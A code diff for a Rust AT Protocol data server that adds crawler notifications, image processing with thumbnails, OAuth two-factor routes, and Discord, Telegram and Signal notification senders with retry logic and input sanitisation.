Arc<CircuitBreaker>) -> Self { 35 + self.circuit_breaker = Some(circuit_breaker); 36 + self 37 + } 38 + 39 + pub fn from_env() -> Option<Self> { 40 + let hostname = std::env::var("PDS_HOSTNAME").ok()?; 41 + let crawler_urls: Vec<String> = std::env::var("CRAWLERS") 42 + .unwrap_or_default() 43 + .split(',') 44 + .filter(|s| !s.is_empty()) 45 + .map(|s| s.trim().to_string()) 46 + .collect(); 47 + 48 + if crawler_urls.is_empty() { 49 + return None; 50 + } 51 + 52 + Some(Self::new(hostname, crawler_urls)) 53 + } 54 + 55 + fn should_notify(&self) -> bool { 56 + let now = std::time::SystemTime::now() 57 + .duration_since(std::time::UNIX_EPOCH) 58 + .unwrap_or_default() 59 + .as_secs(); 60 + let last = self.last_notified.load(Ordering::Relaxed); 61 + now - last >= NOTIFY_THRESHOLD_SECS 62 + } 63 + 64 + fn mark_notified(&self) { 65 + let now = std::time::SystemTime::now() 66 + .duration_since(std::time::UNIX_EPOCH) 67 + .unwrap_or_default() 68 + .as_secs(); 69 + self.last_notified.store(now, Ordering::Relaxed); 70 + } 71 + 72 + pub async fn notify_of_update(&self) { 73 + if !self.should_notify() { 74 + debug!("Skipping crawler notification due to debounce"); 75 + return; 76 + } 77 + 78 + if let Some(cb) = &self.circuit_breaker { 79 + if !cb.can_execute().await { 80 + debug!("Skipping crawler notification due to circuit breaker open"); 81 + return; 82 + } 83 + } 84 + 85 + self.mark_notified(); 86 + 87 + let circuit_breaker = self.circuit_breaker.clone(); 88 + 89 + for crawler_url in &self.crawler_urls { 90 + let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/')); 91 + let hostname = self.hostname.clone(); 92 + let client = self.http_client.clone(); 93 + let cb = circuit_breaker.clone(); 94 + 95 + tokio::spawn(async move { 96 + match client 97 + .post(&url) 98 + .json(&serde_json::json!({ "hostname": hostname })) 99 + .send() 100 + .await 101 + { 102 + Ok(response) => { 103 + if response.status().is_success() { 104 + debug!(crawler = %url, "Successfully notified crawler"); 105 + if let Some(cb) = cb { 106 + cb.record_success().await; 107 + } 108 + } else { 109 + warn!( 110 + crawler = %url, 111 + status = %response.status(), 112 + "Crawler notification returned non-success status" 113 + ); 114 + if let Some(cb) = cb { 115 + cb.record_failure().await; 116 + } 117 + } 118 + } 119 + Err(e) => { 120 + warn!(crawler = %url, error = %e, "Failed to notify crawler"); 121 + if let Some(cb) = cb { 122 + cb.record_failure().await; 123 + } 124 + } 125 + } 126 + }); 127 + } 128 + } 129 + } 130 + 131 + pub async fn start_crawlers_service( 132 + crawlers: Arc<Crawlers>, 133 + mut firehose_rx: broadcast::Receiver<SequencedEvent>, 134 + mut shutdown: watch::Receiver<bool>, 135 + ) { 136 + info!( 137 + hostname = %crawlers.hostname, 138 + crawler_count = crawlers.crawler_urls.len(), 139 + crawlers = ?crawlers.crawler_urls, 140 + "Starting crawlers notification service" 141 + ); 142 + 143 + loop { 144 + tokio::select! { 145 + result = firehose_rx.recv() => { 146 + match result { 147 + Ok(event) => { 148 + if event.event_type == "commit" { 149 + crawlers.notify_of_update().await; 150 + } 151 + } 152 + Err(broadcast::error::RecvError::Lagged(n)) => { 153 + warn!(skipped = n, "Crawlers service lagged behind firehose"); 154 + crawlers.notify_of_update().await; 155 + } 156 + Err(broadcast::error::RecvError::Closed) => { 157 + error!("Firehose channel closed, stopping crawlers service"); 158 + break; 159 + } 160 + } 161 + } 162 + _ = shutdown.changed() => { 163 + if *shutdown.borrow() { 164 + info!("Crawlers service shutting down"); 165 + break; 166 + } 167 + } 168 + } 169 + } 170 + }
+304
src/image/mod.rs
···
··· 1 + use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType}; 2 + use std::io::Cursor; 3 + 4 + pub const THUMB_SIZE_FEED: u32 = 200; 5 + pub const THUMB_SIZE_FULL: u32 = 1000; 6 + 7 + #[derive(Debug, Clone)] 8 + pub struct ProcessedImage { 9 + pub data: Vec<u8>, 10 + pub mime_type: String, 11 + pub width: u32, 12 + pub height: u32, 13 + } 14 + 15 + #[derive(Debug, Clone)] 16 + pub struct ImageProcessingResult { 17 + pub original: ProcessedImage, 18 + pub thumbnail_feed: Option<ProcessedImage>, 19 + pub thumbnail_full: Option<ProcessedImage>, 20 + } 21 + 22 + #[derive(Debug, thiserror::Error)] 23 + pub enum ImageError { 24 + #[error("Failed to decode image: {0}")] 25 + DecodeError(String), 26 + 27 + #[error("Failed to encode image: {0}")] 28 + EncodeError(String), 29 + 30 + #[error("Unsupported image format: {0}")] 31 + UnsupportedFormat(String), 32 + 33 + #[error("Image too large: {width}x{height} exceeds maximum {max_dimension}")] 34 + TooLarge { 35 + width: u32, 36 + height: u32, 37 + max_dimension: u32, 38 + }, 39 + 40 + #[error("File too large: {size} bytes exceeds maximum {max_size} bytes")] 41 + FileTooLarge { size: usize, max_size: usize }, 42 + } 43 + 44 + pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB 45 + 46 + pub struct ImageProcessor { 47 + max_dimension: u32, 48 + max_file_size: usize, 49 + output_format: OutputFormat, 50 + generate_thumbnails: bool, 51 + } 52 + 53 + #[derive(Debug, Clone, Copy)] 54 + pub enum OutputFormat { 55 + WebP, 56 + Jpeg, 57 + Png, 58 + Original, 59 + } 60 + 61 + impl Default for ImageProcessor { 62 + fn default() -> Self { 63 + Self { 64 + max_dimension: 4096, 65 + max_file_size: DEFAULT_MAX_FILE_SIZE, 66 + output_format: OutputFormat::WebP, 67 + generate_thumbnails: true, 68 + } 69 + } 70 + } 71 + 72 + impl ImageProcessor { 73 + pub fn new() -> Self { 74 + Self::default() 75 + } 76 + 77 + pub fn with_max_dimension(mut self, max: u32) -> Self { 78 + self.max_dimension = max; 79 + self 80 + } 81 + 82 + pub fn with_max_file_size(mut self, max: usize) -> Self { 83 + self.max_file_size = max; 84 + self 85 + } 86 + 87 + pub fn with_output_format(mut self, format: OutputFormat) -> Self { 88 + self.output_format = format; 89 + self 90 + } 91 + 92 + pub fn with_thumbnails(mut self, generate: bool) -> Self { 93 + self.generate_thumbnails = generate; 94 + self 95 + } 96 + 97 + pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> { 98 + if data.len() > self.max_file_size { 99 + return Err(ImageError::FileTooLarge { 100 + size: data.len(), 101 + max_size: self.max_file_size, 102 + }); 103 + } 104 + 105 + let format = self.detect_format(mime_type, data)?; 106 + let img = self.decode_image(data, format)?; 107 + 108 + if img.width() > self.max_dimension || img.height() > self.max_dimension { 109 + return Err(ImageError::TooLarge { 110 + width: img.width(), 111 + height: img.height(), 112 + max_dimension: self.max_dimension, 113 + }); 114 + } 115 + 116 + let original = self.encode_image(&img)?; 117 + 118 + let thumbnail_feed = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) { 119 + Some(self.generate_thumbnail(&img, THUMB_SIZE_FEED)?) 120 + } else { 121 + None 122 + }; 123 + 124 + let thumbnail_full = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) { 125 + Some(self.generate_thumbnail(&img, THUMB_SIZE_FULL)?) 126 + } else { 127 + None 128 + }; 129 + 130 + Ok(ImageProcessingResult { 131 + original, 132 + thumbnail_feed, 133 + thumbnail_full, 134 + }) 135 + } 136 + 137 + fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> { 138 + match mime_type.to_lowercase().as_str() { 139 + "image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg), 140 + "image/png" => Ok(ImageFormat::Png), 141 + "image/gif" => Ok(ImageFormat::Gif), 142 + "image/webp" => Ok(ImageFormat::WebP), 143 + _ => { 144 + if let Ok(format) = image::guess_format(data) { 145 + Ok(format) 146 + } else { 147 + Err(ImageError::UnsupportedFormat(mime_type.to_string())) 148 + } 149 + } 150 + } 151 + } 152 + 153 + fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> { 154 + let cursor = Cursor::new(data); 155 + let reader = ImageReader::with_format(cursor, format); 156 + reader 157 + .decode() 158 + .map_err(|e| ImageError::DecodeError(e.to_string())) 159 + } 160 + 161 + fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> { 162 + let (data, mime_type) = match self.output_format { 163 + OutputFormat::WebP => { 164 + let mut buf = Vec::new(); 165 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP) 166 + .map_err(|e| ImageError::EncodeError(e.to_string()))?; 167 + (buf, "image/webp".to_string()) 168 + } 169 + OutputFormat::Jpeg => { 170 + let mut buf = Vec::new(); 171 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg) 172 + .map_err(|e| ImageError::EncodeError(e.to_string()))?; 173 + (buf, "image/jpeg".to_string()) 174 + } 175 + OutputFormat::Png => { 176 + let mut buf = Vec::new(); 177 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png) 178 + .map_err(|e| ImageError::EncodeError(e.to_string()))?; 179 + (buf, "image/png".to_string()) 180 + } 181 + OutputFormat::Original => { 182 + let mut buf = Vec::new(); 183 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png) 184 + .map_err(|e| ImageError::EncodeError(e.to_string()))?; 185 + (buf, "image/png".to_string()) 186 + } 187 + }; 188 + 189 + Ok(ProcessedImage { 190 + data, 191 + mime_type, 192 + width: img.width(), 193 + height: img.height(), 194 + }) 195 + } 196 + 197 + fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> { 198 + let (orig_width, orig_height) = (img.width(), img.height()); 199 + 200 + let (new_width, new_height) = if orig_width > orig_height { 201 + let ratio = max_size as f64 / orig_width as f64; 202 + (max_size, (orig_height as f64 * ratio) as u32) 203 + } else { 204 + let ratio = max_size as f64 / orig_height as f64; 205 + ((orig_width as f64 * ratio) as u32, max_size) 206 + }; 207 + 208 + let thumb = img.resize(new_width, new_height, FilterType::Lanczos3); 209 + self.encode_image(&thumb) 210 + } 211 + 212 + pub fn is_supported_mime_type(mime_type: &str) -> bool { 213 + matches!( 214 + mime_type.to_lowercase().as_str(), 215 + "image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp" 216 + ) 217 + } 218 + 219 + pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> { 220 + let format = image::guess_format(data) 221 + .map_err(|e| ImageError::DecodeError(e.to_string()))?; 222 + 223 + let cursor = Cursor::new(data); 224 + let img = ImageReader::with_format(cursor, format) 225 + .decode() 226 + .map_err(|e| ImageError::DecodeError(e.to_string()))?; 227 + 228 + let mut buf = Vec::new(); 229 + img.write_to(&mut Cursor::new(&mut buf), format) 230 + .map_err(|e| ImageError::EncodeError(e.to_string()))?; 231 + 232 + Ok(buf) 233 + } 234 + } 235 + 236 + #[cfg(test)] 237 + mod tests { 238 + use super::*; 239 + 240 + fn create_test_image(width: u32, height: u32) -> Vec<u8> { 241 + let img = DynamicImage::new_rgb8(width, height); 242 + let mut buf = Vec::new(); 243 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 244 + buf 245 + } 246 + 247 + #[test] 248 + fn test_process_small_image() { 249 + let processor = ImageProcessor::new(); 250 + let data = create_test_image(100, 100); 251 + 252 + let result = processor.process(&data, "image/png").unwrap(); 253 + 254 + assert!(result.thumbnail_feed.is_none()); 255 + assert!(result.thumbnail_full.is_none()); 256 + } 257 + 258 + #[test] 259 + fn test_process_large_image_generates_thumbnails() { 260 + let processor = ImageProcessor::new(); 261 + let data = create_test_image(2000, 1500); 262 + 263 + let result = processor.process(&data, "image/png").unwrap(); 264 + 265 + assert!(result.thumbnail_feed.is_some()); 266 + assert!(result.thumbnail_full.is_some()); 267 + 268 + let feed_thumb = result.thumbnail_feed.unwrap(); 269 + assert!(feed_thumb.width <= THUMB_SIZE_FEED); 270 + assert!(feed_thumb.height <= THUMB_SIZE_FEED); 271 + 272 + let full_thumb = result.thumbnail_full.unwrap(); 273 + assert!(full_thumb.width <= THUMB_SIZE_FULL); 274 + assert!(full_thumb.height <= THUMB_SIZE_FULL); 275 + } 276 + 277 + #[test] 278 + fn test_webp_conversion() { 279 + let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); 280 + let data = create_test_image(500, 500); 281 + 282 + let result = processor.process(&data, "image/png").unwrap(); 283 + assert_eq!(result.original.mime_type, "image/webp"); 284 + } 285 + 286 + #[test] 287 + fn test_reject_too_large() { 288 + let processor = ImageProcessor::new().with_max_dimension(1000); 289 + let data = create_test_image(2000, 2000); 290 + 291 + let result = processor.process(&data, "image/png"); 292 + assert!(matches!(result, Err(ImageError::TooLarge { .. }))); 293 + } 294 + 295 + #[test] 296 + fn test_is_supported_mime_type() { 297 + assert!(ImageProcessor::is_supported_mime_type("image/jpeg")); 298 + assert!(ImageProcessor::is_supported_mime_type("image/png")); 299 + assert!(ImageProcessor::is_supported_mime_type("image/gif")); 300 + assert!(ImageProcessor::is_supported_mime_type("image/webp")); 301 + assert!(!ImageProcessor::is_supported_mime_type("image/bmp")); 302 + assert!(!ImageProcessor::is_supported_mime_type("text/plain")); 303 + } 304 + }
+22
src/lib.rs
··· 1 pub mod api; 2 pub mod auth; 3 pub mod config; 4 pub mod notifications; 5 pub mod oauth; 6 pub mod plc; 7 pub mod repo; 8 pub mod state; 9 pub mod storage; 10 pub mod sync; 11 pub mod util; 12 13 use axum::{ 14 Router, ··· 20 Router::new() 21 .route("/health", get(api::server::health)) 22 .route("/xrpc/_health", get(api::server::health)) 23 .route( 24 "/xrpc/com.atproto.server.describeServer", 25 get(api::server::describe_server), ··· 139 .route( 140 "/xrpc/com.atproto.sync.subscribeRepos", 141 get(sync::subscribe_repos), 142 ) 143 .route( 144 "/xrpc/com.atproto.moderation.createReport", ··· 338 ) 339 .route("/oauth/authorize", get(oauth::endpoints::authorize_get)) 340 .route("/oauth/authorize", post(oauth::endpoints::authorize_post)) 341 .route("/oauth/token", post(oauth::endpoints::token_endpoint)) 342 .route("/oauth/revoke", post(oauth::endpoints::revoke_token)) 343 .route("/oauth/introspect", post(oauth::endpoints::introspect_token)) 344 .route("/xrpc/{*method}", any(api::proxy::proxy_handler)) 345 .with_state(state) 346 }
··· 1 pub mod api; 2 pub mod auth; 3 + pub mod circuit_breaker; 4 pub mod config; 5 + pub mod crawlers; 6 + pub mod image; 7 pub mod notifications; 8 pub mod oauth; 9 pub mod plc; 10 + pub mod rate_limit; 11 pub mod repo; 12 pub mod state; 13 pub mod storage; 14 pub mod sync; 15 pub mod util; 16 + pub mod validation; 17 18 use axum::{ 19 Router, ··· 25 Router::new() 26 .route("/health", get(api::server::health)) 27 .route("/xrpc/_health", get(api::server::health)) 28 + .route("/robots.txt", get(api::server::robots_txt)) 29 .route( 30 "/xrpc/com.atproto.server.describeServer", 31 get(api::server::describe_server), ··· 145 .route( 146 "/xrpc/com.atproto.sync.subscribeRepos", 147 get(sync::subscribe_repos), 148 + ) 149 + .route( 150 + "/xrpc/com.atproto.sync.getHead", 151 + get(sync::get_head), 152 + ) 153 + .route( 154 + "/xrpc/com.atproto.sync.getCheckout", 155 + get(sync::get_checkout), 156 ) 157 .route( 158 "/xrpc/com.atproto.moderation.createReport", ··· 352 ) 353 .route("/oauth/authorize", get(oauth::endpoints::authorize_get)) 354 .route("/oauth/authorize", post(oauth::endpoints::authorize_post)) 355 + .route("/oauth/authorize/select", post(oauth::endpoints::authorize_select)) 356 + .route("/oauth/authorize/2fa", get(oauth::endpoints::authorize_2fa_get)) 357 + .route("/oauth/authorize/2fa", post(oauth::endpoints::authorize_2fa_post)) 358 + .route("/oauth/authorize/deny", post(oauth::endpoints::authorize_deny)) 359 .route("/oauth/token", post(oauth::endpoints::token_endpoint)) 360 .route("/oauth/revoke", post(oauth::endpoints::revoke_token)) 361 .route("/oauth/introspect", post(oauth::endpoints::introspect_token)) 362 + .route( 363 + "/xrpc/com.atproto.temp.checkSignupQueue", 364 + get(api::temp::check_signup_queue), 365 + ) 366 .route("/xrpc/{*method}", any(api::proxy::proxy_handler)) 367 .with_state(state) 368 }
+34 -9
src/main.rs
··· 1 - use bspds::notifications::{EmailSender, NotificationService}; 2 use bspds::state::AppState; 3 use std::net::SocketAddr; 4 use std::process::ExitCode; 5 use tokio::sync::watch; 6 use tracing::{error, info, warn}; 7 ··· 41 let state = AppState::new(pool.clone()).await; 42 43 bspds::sync::listener::start_sequencer_listener(state.clone()).await; 44 - let relays = std::env::var("RELAYS") 45 - .unwrap_or_default() 46 - .split(',') 47 - .filter(|s| !s.is_empty()) 48 - .map(|s| s.to_string()) 49 - .collect(); 50 - bspds::sync::relay_client::start_relay_clients(state.clone(), relays, None).await; 51 52 let (shutdown_tx, shutdown_rx) = watch::channel(false); 53 ··· 60 warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)"); 61 } 62 63 - let notification_handle = tokio::spawn(notification_service.run(shutdown_rx)); 64 65 let app = bspds::app(state); 66 ··· 75 .await; 76 77 notification_handle.await.ok(); 78 79 if let Err(e) = server_result { 80 return Err(format!("Server error: {}", e).into());
··· 1 + use bspds::crawlers::{Crawlers, start_crawlers_service}; 2 + use bspds::notifications::{DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender}; 3 use bspds::state::AppState; 4 use std::net::SocketAddr; 5 use std::process::ExitCode; 6 + use std::sync::Arc; 7 use tokio::sync::watch; 8 use tracing::{error, info, warn}; 9 ··· 43 let state = AppState::new(pool.clone()).await; 44 45 bspds::sync::listener::start_sequencer_listener(state.clone()).await; 46 47 let (shutdown_tx, shutdown_rx) = watch::channel(false); 48 ··· 55 warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)"); 56 } 57 58 + if let Some(discord_sender) = DiscordSender::from_env() { 59 + info!("Discord notifications enabled"); 60 + notification_service = notification_service.register_sender(discord_sender); 61 + } 62 + 63 + if let Some(telegram_sender) = TelegramSender::from_env() { 64 + info!("Telegram notifications enabled"); 65 + notification_service = notification_service.register_sender(telegram_sender); 66 + } 67 + 68 + if let Some(signal_sender) = SignalSender::from_env() { 69 + info!("Signal notifications enabled"); 70 + notification_service = notification_service.register_sender(signal_sender); 71 + } 72 + 73 + let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone())); 74 + 75 + let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() { 76 + let crawlers = Arc::new( 77 + crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone()) 78 + ); 79 + let firehose_rx = state.firehose_tx.subscribe(); 80 + info!("Crawlers notification service enabled"); 81 + Some(tokio::spawn(start_crawlers_service(crawlers, firehose_rx, shutdown_rx))) 82 + } else { 83 + warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)"); 84 + None 85 + }; 86 87 let app = bspds::app(state); 88 ··· 97 .await; 98 99 notification_handle.await.ok(); 100 + if let Some(handle) = crawlers_handle { 101 + handle.await.ok(); 102 + } 103 104 if let Err(e) = server_result { 105 return Err(format!("Server error: {}", e).into());
+7 -4
src/notifications/mod.rs
··· 2 mod service; 3 mod types; 4 5 - pub use sender::{EmailSender, NotificationSender}; 6 pub use service::{ 7 - enqueue_account_deletion, enqueue_email_update, enqueue_email_verification, 8 - enqueue_notification, enqueue_password_reset, enqueue_plc_operation, enqueue_welcome, 9 - NotificationService, 10 }; 11 pub use types::{ 12 NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
··· 2 mod service; 3 mod types; 4 5 + pub use sender::{ 6 + DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender, 7 + is_valid_phone_number, sanitize_header_value, 8 + }; 9 pub use service::{ 10 + channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update, 11 + enqueue_email_verification, enqueue_notification, enqueue_password_reset, 12 + enqueue_plc_operation, enqueue_welcome, NotificationService, 13 }; 14 pub use types::{ 15 NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
+293 -4
src/notifications/sender.rs
··· 1 use async_trait::async_trait; 2 use std::process::Stdio; 3 use tokio::io::AsyncWriteExt; 4 use tokio::process::Command; 5 6 use super::types::{NotificationChannel, QueuedNotification}; 7 8 #[async_trait] 9 pub trait NotificationSender: Send + Sync { ··· 24 25 #[error("External service error: {0}")] 26 ExternalService(String), 27 } 28 29 pub struct EmailSender { ··· 47 Some(Self::new(from_address, from_name)) 48 } 49 50 - fn format_email(&self, notification: &QueuedNotification) -> String { 51 - let subject = notification.subject.as_deref().unwrap_or("Notification"); 52 let from_header = if self.from_name.is_empty() { 53 self.from_address.clone() 54 } else { 55 - format!("{} <{}>", self.from_name, self.from_address) 56 }; 57 58 format!( 59 "From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}", 60 from_header, 61 - notification.recipient, 62 subject, 63 notification.body 64 ) ··· 96 Ok(()) 97 } 98 }
··· 1 use async_trait::async_trait; 2 + use reqwest::Client; 3 + use serde_json::json; 4 use std::process::Stdio; 5 + use std::time::Duration; 6 use tokio::io::AsyncWriteExt; 7 use tokio::process::Command; 8 9 use super::types::{NotificationChannel, QueuedNotification}; 10 + 11 + const HTTP_TIMEOUT_SECS: u64 = 30; 12 + const MAX_RETRIES: u32 = 3; 13 + const INITIAL_RETRY_DELAY_MS: u64 = 500; 14 15 #[async_trait] 16 pub trait NotificationSender: Send + Sync { ··· 31 32 #[error("External service error: {0}")] 33 ExternalService(String), 34 + 35 + #[error("Invalid recipient format: {0}")] 36 + InvalidRecipient(String), 37 + 38 + #[error("Request timeout")] 39 + Timeout, 40 + 41 + #[error("Max retries exceeded: {0}")] 42 + MaxRetriesExceeded(String), 43 + } 44 + 45 + fn create_http_client() -> Client { 46 + Client::builder() 47 + .timeout(Duration::from_secs(HTTP_TIMEOUT_SECS)) 48 + .connect_timeout(Duration::from_secs(10)) 49 + .build() 50 + .unwrap_or_else(|_| Client::new()) 51 + } 52 + 53 + fn is_retryable_status(status: reqwest::StatusCode) -> bool { 54 + status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS 55 + } 56 + 57 + async fn retry_delay(attempt: u32) { 58 + let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt); 59 + tokio::time::sleep(Duration::from_millis(delay_ms)).await; 60 + } 61 + 62 + pub fn sanitize_header_value(value: &str) -> String { 63 + value.replace(['\r', '\n'], " ").trim().to_string() 64 + } 65 + 66 + pub fn is_valid_phone_number(number: &str) -> bool { 67 + if number.len() < 2 || number.len() > 20 { 68 + return false; 69 + } 70 + let mut chars = number.chars(); 71 + if chars.next() != Some('+') { 72 + return false; 73 + } 74 + let remaining: String = chars.collect(); 75 + !remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit()) 76 } 77 78 pub struct EmailSender { ··· 96 Some(Self::new(from_address, from_name)) 97 } 98 99 + pub fn format_email(&self, notification: &QueuedNotification) -> String { 100 + let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification")); 101 + let recipient = sanitize_header_value(&notification.recipient); 102 let from_header = if self.from_name.is_empty() { 103 self.from_address.clone() 104 } else { 105 + format!("{} <{}>", sanitize_header_value(&self.from_name), self.from_address) 106 }; 107 108 format!( 109 "From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}", 110 from_header, 111 + recipient, 112 subject, 113 notification.body 114 ) ··· 146 Ok(()) 147 } 148 } 149 + 150 + pub struct DiscordSender { 151 + webhook_url: String, 152 + http_client: Client, 153 + } 154 + 155 + impl DiscordSender { 156 + pub fn new(webhook_url: String) -> Self { 157 + Self { 158 + webhook_url, 159 + http_client: create_http_client(), 160 + } 161 + } 162 + 163 + pub fn from_env() -> Option<Self> { 164 + let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?; 165 + Some(Self::new(webhook_url)) 166 + } 167 + } 168 + 169 + #[async_trait] 170 + impl NotificationSender for DiscordSender { 171 + fn channel(&self) -> NotificationChannel { 172 + NotificationChannel::Discord 173 + } 174 + 175 + async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 176 + let subject = notification.subject.as_deref().unwrap_or("Notification"); 177 + let content = format!("**{}**\n\n{}", subject, notification.body); 178 + 179 + let payload = json!({ 180 + "content": content, 181 + "username": "BSPDS" 182 + }); 183 + 184 + let mut last_error = None; 185 + for attempt in 0..MAX_RETRIES { 186 + let result = self 187 + .http_client 188 + .post(&self.webhook_url) 189 + .json(&payload) 190 + .send() 191 + .await; 192 + 193 + match result { 194 + Ok(response) => { 195 + if response.status().is_success() { 196 + return Ok(()); 197 + } 198 + 199 + let status = response.status(); 200 + if is_retryable_status(status) && attempt < MAX_RETRIES - 1 { 201 + last_error = Some(format!("Discord webhook returned {}", status)); 202 + retry_delay(attempt).await; 203 + continue; 204 + } 205 + 206 + let body = response.text().await.unwrap_or_default(); 207 + return Err(SendError::ExternalService(format!( 208 + "Discord webhook returned {}: {}", 209 + status, body 210 + ))); 211 + } 212 + Err(e) => { 213 + if e.is_timeout() { 214 + if attempt < MAX_RETRIES - 1 { 215 + last_error = Some(format!("Discord request timed out")); 216 + retry_delay(attempt).await; 217 + continue; 218 + } 219 + return Err(SendError::Timeout); 220 + } 221 + return Err(SendError::ExternalService(format!( 222 + "Discord request failed: {}", 223 + e 224 + ))); 225 + } 226 + } 227 + } 228 + 229 + Err(SendError::MaxRetriesExceeded( 230 + last_error.unwrap_or_else(|| "Unknown error".to_string()), 231 + )) 232 + } 233 + } 234 + 235 + pub struct TelegramSender { 236 + bot_token: String, 237 + http_client: Client, 238 + } 239 + 240 + impl TelegramSender { 241 + pub fn new(bot_token: String) -> Self { 242 + Self { 243 + bot_token, 244 + http_client: create_http_client(), 245 + } 246 + } 247 + 248 + pub fn from_env() -> Option<Self> { 249 + let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?; 250 + Some(Self::new(bot_token)) 251 + } 252 + } 253 + 254 + #[async_trait] 255 + impl NotificationSender for TelegramSender { 256 + fn channel(&self) -> NotificationChannel { 257 + NotificationChannel::Telegram 258 + } 259 + 260 + async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 261 + let chat_id = &notification.recipient; 262 + let subject = notification.subject.as_deref().unwrap_or("Notification"); 263 + let text = format!("*{}*\n\n{}", subject, notification.body); 264 + 265 + let url = format!( 266 + "https://api.telegram.org/bot{}/sendMessage", 267 + self.bot_token 268 + ); 269 + 270 + let payload = json!({ 271 + "chat_id": chat_id, 272 + "text": text, 273 + "parse_mode": "Markdown" 274 + }); 275 + 276 + let mut last_error = None; 277 + for attempt in 0..MAX_RETRIES { 278 + let result = self 279 + .http_client 280 + .post(&url) 281 + .json(&payload) 282 + .send() 283 + .await; 284 + 285 + match result { 286 + Ok(response) => { 287 + if response.status().is_success() { 288 + return Ok(()); 289 + } 290 + 291 + let status = response.status(); 292 + if is_retryable_status(status) && attempt < MAX_RETRIES - 1 { 293 + last_error = Some(format!("Telegram API returned {}", status)); 294 + retry_delay(attempt).await; 295 + continue; 296 + } 297 + 298 + let body = response.text().await.unwrap_or_default(); 299 + return Err(SendError::ExternalService(format!( 300 + "Telegram API returned {}: {}", 301 + status, body 302 + ))); 303 + } 304 + Err(e) => { 305 + if e.is_timeout() { 306 + if attempt < MAX_RETRIES - 1 { 307 + last_error = Some(format!("Telegram request timed out")); 308 + retry_delay(attempt).await; 309 + continue; 310 + } 311 + return Err(SendError::Timeout); 312 + } 313 + return Err(SendError::ExternalService(format!( 314 + "Telegram request failed: {}", 315 + e 316 + ))); 317 + } 318 + } 319 + } 320 + 321 + Err(SendError::MaxRetriesExceeded( 322 + last_error.unwrap_or_else(|| "Unknown error".to_string()), 323 + )) 324 + } 325 + } 326 + 327 + pub struct SignalSender { 328 + signal_cli_path: String, 329 + sender_number: String, 330 + } 331 + 332 + impl SignalSender { 333 + pub fn new(signal_cli_path: String, sender_number: String) -> Self { 334 + Self { 335 + signal_cli_path, 336 + sender_number, 337 + } 338 + } 339 + 340 + pub fn from_env() -> Option<Self> { 341 + let signal_cli_path = std::env::var("SIGNAL_CLI_PATH") 342 + .unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string()); 343 + let sender_number = std::env::var("SIGNAL_SENDER_NUMBER").ok()?; 344 + Some(Self::new(signal_cli_path, sender_number)) 345 + } 346 + } 347 + 348 + #[async_trait] 349 + impl NotificationSender for SignalSender { 350 + fn channel(&self) -> NotificationChannel { 351 + NotificationChannel::Signal 352 + } 353 + 354 + async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 355 + let recipient = &notification.recipient; 356 + 357 + if !is_valid_phone_number(recipient) { 358 + return Err(SendError::InvalidRecipient(format!( 359 + "Invalid phone number format: {}", 360 + recipient 361 + ))); 362 + } 363 + 364 + let subject = notification.subject.as_deref().unwrap_or("Notification"); 365 + let message = format!("{}\n\n{}", subject, notification.body); 366 + 367 + let output = Command::new(&self.signal_cli_path) 368 + .arg("-u") 369 + .arg(&self.sender_number) 370 + .arg("send") 371 + .arg("-m") 372 + .arg(&message) 373 + .arg(recipient) 374 + .output() 375 + .await?; 376 + 377 + if !output.status.success() { 378 + let stderr = String::from_utf8_lossy(&output.stderr); 379 + return Err(SendError::ExternalService(format!( 380 + "signal-cli failed: {}", 381 + stderr 382 + ))); 383 + } 384 + 385 + Ok(()) 386 + } 387 + }
+36
src/notifications/service.rs
··· 443 ) 444 .await 445 }
